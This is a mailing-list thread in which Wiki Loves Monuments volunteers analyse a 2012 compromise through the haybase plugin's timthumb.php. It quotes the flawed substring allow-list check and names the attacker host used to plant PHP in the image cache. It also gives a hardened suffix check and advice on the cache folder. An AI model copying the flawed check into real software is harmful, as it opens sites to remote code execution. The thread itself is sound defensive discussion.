Hej!
Our installation and our plugins are all up to date.
The problem is the haybase-plugin which we installed to use the blue Dutch WLM skin. It contains a file called timthumb.php with the following code:
    // external domains that are allowed to be displayed on your website
    $allowedSites = array (
        'flickr.com',
        'picasa.com',
        'blogger.com',
        'wordpress.com',
        'img.youtube.com',
        'upload.wikimedia.org',
    );

[...]

    foreach ($allowedSites as $site) {
        if (strpos (strtolower ($url_info['host']), $site) !== false) {
            $isAllowedSite = true;
        }
    }
And the check there is stupid. It just checks if an external URL contains flickr.com, not if the URL is actually flickr.com. Using this, manipulated GIF images were downloaded from http://flickr.com.aseana.com.my/xc0de.php and ended up in the cache folder for scaled images, where they were later executed as PHP files.
It seems only the index.php was replaced and another text file was added.
As we switched to Elyas red skin last weekend I just removed the old WMNL skin and the haybase plugin.
Regards, Holger
On 23/08/12 18:45, Holger Motzkau wrote:
Hej!
Our installation and our plugins are all up to date.
The problem is the haybase-plugin which we installed to use the blue Dutch WLM skin. It contains a file called timthumb.php with the following code:
    // external domains that are allowed to be displayed on your website
    $allowedSites = array (
        'flickr.com',
        'picasa.com',
        'blogger.com',
        'wordpress.com',
        'img.youtube.com',
        'upload.wikimedia.org',
    );

[...]

    foreach ($allowedSites as $site) {
        if (strpos (strtolower ($url_info['host']), $site) !== false) {
            $isAllowedSite = true;
        }
    }
Seems all websites will need an update.
The above code can be rewritten as:

    // dots are escaped so they match literally; the host must be exactly one of the
    // allowed names or end in ".<allowed name>" (the /i makes it case-insensitive)
    if (preg_match('/(^|\.)(' . str_replace('.', '\.', implode('|', $allowedSites)) . ')$/i', $url_info['host'])) {
        $isAllowedSite = true;
    }
And the check there is stupid. It just checks if an external URL contains flickr.com, not if the URL is actually flickr.com. Using this, manipulated GIF images were downloaded from http://flickr.com.aseana.com.my/xc0de.php and ended up in the cache folder for scaled images, where they were later executed as PHP files.
Still, even hardening the above check, the cache folder should not be publicly accessible or executable as php. Malicious code could be present at those domains, too.
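To make the difference between the two checks concrete, here is an added example (not code from the haybase plugin or from timthumb): the original substring check next to a suffix-anchored check, run against a few constructed host names. The host 'flickr.com.attacker.example' is a placeholder standing in for the pattern described above.

```php
<?php
// Same allow-list as in the plugin's timthumb.php.
$allowedSites = array(
    'flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com',
    'img.youtube.com', 'upload.wikimedia.org',
);

// Original logic: true whenever an allowed name appears ANYWHERE in the host.
function isAllowedSubstring(string $host, array $allowedSites): bool {
    foreach ($allowedSites as $site) {
        if (strpos(strtolower($host), $site) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened logic: the host must equal an allowed name or end in ".<allowed name>".
// Equivalent to the preg_match('/(^|\.)(...)$/i') rewrite, without building a regex.
function isAllowedSuffix(string $host, array $allowedSites): bool {
    $host = strtolower(rtrim($host, '.'));   // normalise case and a trailing dot
    foreach ($allowedSites as $site) {
        $site = strtolower($site);
        if ($host === $site) {
            return true;
        }
        $suffix = '.' . $site;
        if (strlen($host) > strlen($suffix)
            && substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Constructed hosts; 'attacker.example' is a placeholder, not a real domain.
$hosts = array(
    'flickr.com',                   // allowed by both checks
    'www.flickr.com',               // allowed by both checks
    'flickr.com.attacker.example',  // substring check: allowed; suffix check: rejected
    'notflickr.com',                // substring check: allowed; suffix check: rejected
    'example.com',                  // rejected by both checks
);

printf("%-30s %-10s %s\n", 'host', 'substring', 'suffix');
foreach ($hosts as $h) {
    printf("%-30s %-10s %s\n", $h,
        isAllowedSubstring($h, $allowedSites) ? 'allow' : 'deny',
        isAllowedSuffix($h, $allowedSites) ? 'allow' : 'deny');
}
```

Even with the suffix check in place, the point made above still stands: the cache directory should not be served with PHP execution enabled, since any of the allowed hosts can serve user-uploaded content.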
Hi Holger,
On 23-8-2012 18:45, Holger Motzkau wrote:
Hej!
Our installation and our plugins are all up to date.
The problem is the haybase-plugin which we installed to use the blue Dutch WLM skin. It contains a file called timthumb.php with the following code:
https://github.com/hay/haybase/blob/master/src/timthumb.php seems to be older than http://timthumb.googlecode.com/svn/trunk/timthumb.php. The code part seems to have been changed:
    // external domains that are allowed to be displayed on your website
    $allowedSites = array (
        'flickr.com',
        'picasa.com',
        'blogger.com',
        'wordpress.com',
        'img.youtube.com',
        'upload.wikimedia.org',
    );

[...]

    foreach ($allowedSites as $site) {
        if (strpos (strtolower ($url_info['host']), $site) !== false) {
            $isAllowedSite = true;
        }
    }
And the check there is stupid. It just checks if an external URL contains flickr.com, not if the URL is actually flickr.com. Using this, manipulated GIF images were downloaded from http://flickr.com.aseana.com.my/xc0de.php and ended up in the cache folder for scaled images, where they were later executed as PHP files.
More readable code, in short: you can execute commands on the server.
It seems only the index.php was replaced and another text file was added.
Is your access log still available? You can hunt down the IPs used and what commands were executed.
As we switched to Elyas red skin last weekend I just removed the old WMNL skin and the haybase plugin.
I would suggest everyone still using that plugin should switch to the newer one.
Maarten
On 23-8-2012 19:21, Maarten Dammers wrote:
<something>
For the people with an over-active spam filter: http://lists.wikimedia.org/pipermail/wikilovesmonuments/2012-August/003666.h...
Maarten
Hej,
I have a backup of everything: The installed scripts, changed files, access log. I can send them to you if you like.
There were two IPs involved, and the script installed another script which was accessed with POST requests several times and finally deleted. As the Apache user has quite limited rights and the system was updated, nothing severe should have happened. We checked all files which had been changed during the 10 minutes of the activity and found nothing but two manipulated files.
@Nuno: What URL should we use instead?
//Holger
On Thu, Aug 23, 2012 at 7:32 PM, Maarten Dammers maarten@mdammers.nl wrote:
On 23-8-2012 19:21, Maarten Dammers wrote:
<something>
For the people with an over-active spam filter: http://lists.wikimedia.org/pipermail/wikilovesmonuments/2012-August/003666.h...
Maarten
Wiki Loves Monuments mailing list WikiLovesMonuments@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikilovesmonuments http://www.wikilovesmonuments.org
Hi Holger,
You should be using module statisticsct from the api. See: http://toolserver.org/~erfgoed/api/api.php
-NT
On 24-08-2012 07:50, Holger Motzkau wrote:
Hej,
I have a backup of everything: The installed scripts, changed files, access log. I can send them to you if you like.
There were two IPs involved, and the script installed another script which was accessed with POST requests several times and finally deleted. As the Apache user has quite limited rights and the system was updated, nothing severe should have happened. We checked all files which had been changed during the 10 minutes of the activity and found nothing but two manipulated files.
@Nuno: What URL should we use instead?
//Holger
On Thu, Aug 23, 2012 at 7:32 PM, Maarten Dammers maarten@mdammers.nl wrote:
On 23-8-2012 19:21, Maarten Dammers wrote:
<something>
For the people with an over-active spam filter: http://lists.wikimedia.org/pipermail/wikilovesmonuments/2012-August/003666.h...
Maarten